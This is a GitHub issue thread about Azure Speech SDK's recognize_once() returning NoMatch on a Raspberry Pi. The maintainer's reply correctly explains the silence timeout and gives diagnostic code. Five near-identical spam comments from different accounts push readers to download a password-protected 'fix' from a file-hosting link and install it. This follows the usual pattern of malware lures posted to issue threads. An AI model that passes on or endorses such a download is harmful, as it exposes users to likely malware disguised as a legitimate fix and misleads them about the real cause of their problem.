### ISSUE TITLE
Keep getting speechsdk.ResultReason.NoMatch error with USB microphone on Raspberry Pi

### ISSUE THREAD

**Issue by rivendell1984** [Azure-Samples/cognitive-services-speech-sdk#2562]
I am using a USB microphone on a Raspberry Pi and following the Azure Cognitive Services speech recognition sample code in Python from GitHub:

[speech_sample.py](https://github.com/Azure-Samples/cognitive-services-speech-sdk/blob/master/samples/python/console/speech_sample.py)

```
...
    result = speech_recognizer.recognize_once()

    # Check the result
    if result.reason == speechsdk.ResultReason.RecognizedSpeech:
        print("Recognized: {}".format(result.text))
    elif result.reason == speechsdk.ResultReason.NoMatch:
        print("No speech could be recognized")

...
```

I haven't spoken, but it keeps returning the `speechsdk.ResultReason.NoMatch` error instead of recognizing speech:

```
SpeechRecognitionResult(result_id=787567342c65413589efb200b6fbf086, text="", reason=ResultReason.NoMatch)
```

It always interrupts the speech recognition, how can I get it to return recognized speech instead of the NoMatch error?

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by pankopon** [comment]
Hi, this is not an error. `recognize_once()` returns when a single phrase is recognized, there is a silence timeout, or there is an error - whichever happens first. See the API description:
https://learn.microsoft.com/python/api/azure-cognitiveservices-speech/azure.cognitiveservices.speech.speechrecognizer#azure-cognitiveservices-speech-speechrecognizer-recognize-once

> I haven't spoken

So if there is no speech input (and recognition is not canceled due to an authentication/connection/other error), you will get a silence timeout. Replace the code that checks the result with the following that will print more details:
```
if result.reason == speechsdk.ResultReason.RecognizedSpeech:
    print("Recognized: {}".format(result.text))
elif result.reason == speechsdk.ResultReason.NoMatch:
    print("No speech could be recognized: {}".format(result.no_match_details))
elif result.reason == speechsdk.ResultReason.Canceled:
    cancellation_details = result.cancellation_details
    print("Recognition canceled: {}".format(cancellation_details.reason))
    if cancellation_details.reason == speechsdk.CancellationReason.Error:
        print("Error details: {}".format(cancellation_details.error_details))
```
If nothing is spoken, the output will be
```
No speech could be recognized: NoMatchDetails(reason=NoMatchReason.InitialSilenceTimeout)
```
The reason may be also `NoMatchReason.NotRecognized` if the input was not complete silence, e.g. some background noise. Ref. possible `NoMatchReason` values
https://learn.microsoft.com/python/api/azure-cognitiveservices-speech/azure.cognitiveservices.speech.nomatchreason

If there is a problem with e.g. the subscription key, you will see
```
Recognition canceled: CancellationReason.Error
Error details: WebSocket upgrade failed: Authentication error (401). Please check subscription information and region name.
```
If you want to run recognition regardless of periods of silence, and recognize multiple phrases until explicitly stopped, use `start_continuous_recognition()` and `stop_continuous_recognition()`. See one usage example in
https://github.com/Azure-Samples/cognitive-services-speech-sdk/blob/61d7a46a53c92bd2ac652f19a383e888158a9395/samples/python/console/speech_sample.py#L328

If nothing is recognized even though you are speaking, verify that your microphone is working: https://github.com/Azure-Samples/cognitive-services-speech-sdk/issues/1346#issuecomment-995361974

**Comment by pankopon** [comment]
Closed as answered since no further questions received.
